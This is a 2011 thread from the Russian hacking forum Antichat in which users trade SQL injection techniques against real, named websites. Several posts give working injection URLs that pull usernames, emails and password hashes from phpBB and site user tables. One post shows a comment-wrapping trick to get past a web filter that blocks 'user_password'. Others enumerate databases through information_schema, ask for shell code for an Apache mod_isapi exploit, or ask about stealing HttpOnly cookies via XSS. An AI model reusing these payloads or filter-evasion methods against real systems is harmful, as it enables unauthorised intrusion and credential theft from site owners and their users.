
15.02.2011, 09:00
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Wildking
Запрос типа: http://ххх.ххх.ххх.ххх/addon/bossmap/index.php/ выдает ошибку:

Слеш в конце обязателен. Как такое получается и можно ли развить?
посмотри постом что передается..
|
|
|

15.02.2011, 23:20
|
|
Новичок
Регистрация: 11.02.2011
Сообщений: 22
С нами:
8026166
Репутация:
0
|
|
И еще вопрос-просьба. Кодом шела может кто располагает, для открытия порта под эксплоит "Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit" ?
|
|
|

16.02.2011, 16:25
|
|
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами:
8039126
Репутация:
-6
|
|
как вывести информацию через xpatch injection там вроде в xml данные зранятся можно с примером
|
|
|

16.02.2011, 18:29
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,user_email),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=
так выводит нормально, как только в запросе ставлю слово user_password , запретка сразу срабатывает...пару таких запросов и бан по айпи...вроде не новичек , но вот как обойти хз..какие мысли?
|
|
|

16.02.2011, 19:09
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от Gorev
http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,user_email),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=
так выводит нормально, как только в запросе ставлю слово user_password , запретка сразу срабатывает...пару таких запросов и бан по айпи...вроде не новичек , но вот как обойти хз..какие мысли?
Сообщение от None
http://www.deva.ws/index.php?idAutor=-9+user_password
Not Acceptable
http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,/*!user_password*/),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=
|
|
|

17.02.2011, 16:09
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Допустим есть сайт который стоит на одной базе mysql, а цмска стоит на другой к примеру cms.mysql можноли как нить при мускль иньекции с бд user.mysql выдернуть таблици с cms.mysql
|
|
|

17.02.2011, 16:14
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
если я правильно понимаю, то:
1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+inf ormation_schema.tables+where+table_schema='имя базы'
2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+fro m+database_name.table_name
|
|
|

17.02.2011, 16:34
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Seravin
если я правильно понимаю, то:
1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+inf ormation_schema.tables+where+table_schema='имя базы'
2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+fro m+database_name.table_name
это подействует в случае когда конкретно уже знаем какие таблици в базе и поля, знаю что точно есть другая база, как можно с одной просмотреть какие есть таблици и поля в другой базе, для примера:
_http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,concat_ws(0x3b,version(),database (),user()),3,4,concat_ws(0x3a,name,password)+from+ users--
а админка на WP:
_http://www.indiagatebkk.com/blog/wp-login.php
|
|
|

17.02.2011, 16:41
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
там одна база
http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,2,3,4,group_concat%28schema_name% 29+from+information_schema.schemata--
грамотней попытайся задать вопрос
|
|
|

17.02.2011, 21:21
|
|
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами:
8118326
Репутация:
-5
|
|
можно узнать куки через XSS иньекцию если стоит HTTPOnly флаг?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|